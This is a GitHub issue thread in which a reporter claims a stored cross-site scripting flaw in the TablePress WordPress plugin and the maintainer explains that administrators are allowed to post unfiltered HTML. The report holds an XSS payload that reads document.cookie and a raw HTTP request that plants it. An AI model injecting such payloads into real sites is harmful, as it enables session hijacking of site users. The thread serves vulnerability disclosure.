### ISSUE TITLE
Cross‑Site Scripting (XSS) - Table Content

### ISSUE THREAD

**Issue by nullfil3** [TobiasBg/TablePress#144]
Hello all.

While testing, i found a Cross‑Site Scripting (XSS) inside the "Table Content Box".  

![xss_poc](https://user-images.githubusercontent.com/66173541/102268980-c2731480-3efa-11eb-8ffc-f3281f1a506a.gif)

As can be seen through the GIF above, it is possible to insert HTML javascript codes within the field in question.

* Steps to reproduce

1 - go to TablePress
2 - Create a table
3 - At the Table Content, insert inside the first row the value nullfil3 ><img onerror=alert(document.cookie) src/> aaaaaaaa
4 - At the top, Click on Save
5 - Click on Preview to the the Browser pop up alert with all cookies.

* Misc

The request responsible to insert the malicious content is

```html
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=tablepress&action=edit&table_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1588
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=nullfil3%7C1608233144%7COEvRWuMJ4P9ZQP14yrhBkv2qmkgrk8v2u903nQVq3DH%7Ce1aac170cbda980ad889e1cf8d42c511a439b2d7c3fca1539f8e28c5cc1ab012; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=nullfil3%7C1608233144%7COEvRWuMJ4P9ZQP14yrhBkv2qmkgrk8v2u903nQVq3DH%7C76702fa728e95ec3da13f7dc1a28a099d45b7ba2724832cfa4d2209704a482b0; wp-settings-time-1=1608060365; wp-settings-1=deleted

action=tablepress_save_table&_ajax_nonce=412d0cc075&tablepress[id]=1&tablepress[new_id]=1&tablepress[name]=nullfil3&tablepress[description]=nullfil3&tablepress[number][rows]=5&tablepress[number][columns]=5&tablepress[number][hidden_rows]=0&tablepress[number][hidden_columns]=0&tablepress[data]=[["nullfil3 ><img onerror=confirm(4) src/> aaaaaaaa","","","",""],["","","","",""],["","","","",""],["","","","",""],["","","","",""]]&tablepress[options]={"table_head":true,"table_foot":false,"alternating_row_colors":true,"row_hover":true,"print_name":false,"print_description":false,"print_name_position":"above","print_description_position":"below","extra_css_classes":"","use_datatables":true,"datatables_sort":true,"datatables_filter":true,"datatables_paginate":true,"datatables_lengthchange":true,"datatables_paginate_entries":"10","datatables_info":true,"datatables_scrollx":false,"datatables_custom_commands":""}&tablepress[visibility]={"rows":[1,1,1,1,1],"columns":[1,1,1,1,1]}

```

**Comment by TobiasBg** [comment]
Hi @nullfil3,

thanks for your report, I really appreciate it!

According to your screenshots, you were logged-in as an Administrator when you submitted the payload.
Administrator and Editor users are permitted to submit unfiltered HTML and JavaScript. WordPress (and TablePress) allows them to do this. These users have the `unfiltered_html` capability, see https://wordpress.org/support/article/roles-and-capabilities/#unfiltered_html.
This is not a security vulnerability in the WordPress eco-system.
You can test this yourself by adding the following to your wp-config.php file, which disables this capability:
`define( 'DISALLOW_UNFILTERED_HTML', true );`
You will notice that with this constant set to true, that you will not be able to reproduce your issue.
You can read more about this at https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-some-users-allowed-to-post-unfiltered-html

Best wishes,
Tobias

**Comment by nullfil3** [comment]
OK! thanks for the feedback, i've read about "DISALLOW_UNFILTERED_HTML" but for me this behavior is for all users include admin.

**Comment by TobiasBg** [comment]
Hi @nullfil3,

do you mean that you can recreate this issue while you are logged-in into WordPress as a user that only has the "Author" role? I could not reproduce this in my tests...

Regards,
Tobias
